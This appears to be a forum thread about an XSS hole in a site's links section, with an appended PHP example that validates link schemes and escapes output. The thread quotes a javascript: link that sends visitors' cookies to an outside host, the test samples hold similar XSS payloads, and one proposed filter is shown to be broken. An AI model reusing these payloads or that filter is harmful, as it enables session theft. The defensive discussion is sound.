Links section

Z:
javascript:document.location="http://osmosis.ath.cx/~mals/mals/o.php?o="+document.cookie

Hmm, does not look good...

Thanks for alerting us.

I deleted the harmful links.

Currently I have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for the links section?

@mals: Thanks for finding a real security problem :)
The geeks shall inherit the properties and methods of object earth.
Links should be validated by admins first.
Kender:
I agree with theAnswer.
What's to stop people from adding tons of ad-links?
The amount of links you can add depends on your totalscore.

How about this snippet to prevent XSS in links?
<?php
// Snippet as posted: strip "http://" and then refuse anything that still carries a scheme separator.
$url = str_replace("http://", "", $url); // removes every occurrence of "http://", not only a leading one
if (strpos($url, "://") !== false) {     // note: "https://" still contains "://" here, and a scheme
                                          // written without "//" (e.g. "javascript:") contains none
   return htmlDisplayError("only valid links please."); // forum's own error helper
}


My guess is that this would only make it slightly harder to exploit.
stop trying to be funny.
Z:
There are tons of solutions on the net, but this one looks short and good enough:

http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
Maybe check out the W3C specification for URLs. I bet you'll find a regex for it.
Z:
I think regex is not a good way, because nothing ensures that a valid URL doesn't contain an evil payload. This statement is only theoretical, but true.

Lessons learned: preventing XSS is a hard nut...
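The two points raised above (the str_replace/"://" snippet, and the remark that a syntactically valid URL can still carry a payload) are easiest to see side by side in code. The following is an added example written for this thread; it is not code from the thread or from the forum's own code base. The function names validate_link_url, render_link and thread_snippet_accepts are hypothetical, and the sample URLs are constructed for the comparison (the first one only mirrors the shape of the link reported at the top of the thread). The approach is the usual defender's answer: decide on the parsed scheme with an allowlist instead of substring checks, and HTML-encode the value when it is written into the page, so that "valid but evil" input is rendered inert rather than filtered.

```php
<?php
// Added example (not the forum's code): scheme allowlist + output encoding for user-submitted links.
declare(strict_types=1);

/**
 * Return the URL unchanged if it is an http(s) link we are willing to publish, otherwise null.
 * The decision is made on the parsed scheme, so "javascript:", "data:" or "vbscript:" links
 * never pass, however they are capitalised or spaced.
 */
function validate_link_url(string $raw): ?string
{
    $url = trim($raw);
    // Whitespace or control characters inside a URL are a classic way to confuse parsers
    // and browsers ("java<TAB>script:"), so such input is refused outright.
    if ($url === '' || preg_match('/[\x00-\x20\x7f]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Allowlist of schemes, compared case-insensitively.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // "user:pass@host" style links are mostly used for deceptive URLs; refuse them as well.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    return $url;
}

/** Render the link as an anchor; the escaping here is what actually stops markup injection. */
function render_link(string $url, string $title): string
{
    $href = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $text = htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="' . $href . '" rel="nofollow noopener" target="_blank">' . $text . '</a>';
}

/** The snippet proposed in the thread, wrapped so it returns true when the link would be accepted. */
function thread_snippet_accepts(string $url): bool
{
    $url = str_replace("http://", "", $url);
    return strpos($url, "://") === false;
}

// Constructed sample inputs (not real links): the reported payload shape, two ordinary links,
// an upper-cased scheme, a tab-split scheme, a valid URL carrying markup, and a data: URL.
$samples = [
    'javascript:document.location="http://example.invalid/?o="+document.cookie',
    'http://example.com/',
    'https://example.com/path?q=1&r=2',
    'JAVASCRIPT:alert(1)',
    "java\tscript:alert(1)",
    'http://example.com/"><script>alert(1)</script>',
    'data:text/html,<script>alert(1)</script>',
];

foreach ($samples as $s) {
    $snippet = thread_snippet_accepts($s) ? 'accepts' : 'rejects';
    $valid   = validate_link_url($s);
    $ours    = $valid === null ? 'rejects' : 'accepts';
    printf("snippet %-8s validator %-8s %s\n", $snippet, $ours, $s);
    if ($valid !== null) {
        // Even the accepted URL that contains quotes and <script> tags comes out harmless here.
        echo '    ' . render_link($valid, 'title " with <quotes>') . "\n";
    }
}
```

Running it shows the two defects of the substring check: it accepts every scheme that is not spelled with "//" (javascript:, data:, the tab-split variant), and it rejects every https link because "https://" still contains "://" after the replace. The allowlist version accepts only http and https, and the one accepted URL that carries quotes and a script tag is neutralised by htmlspecialchars in render_link rather than by trying to strip it.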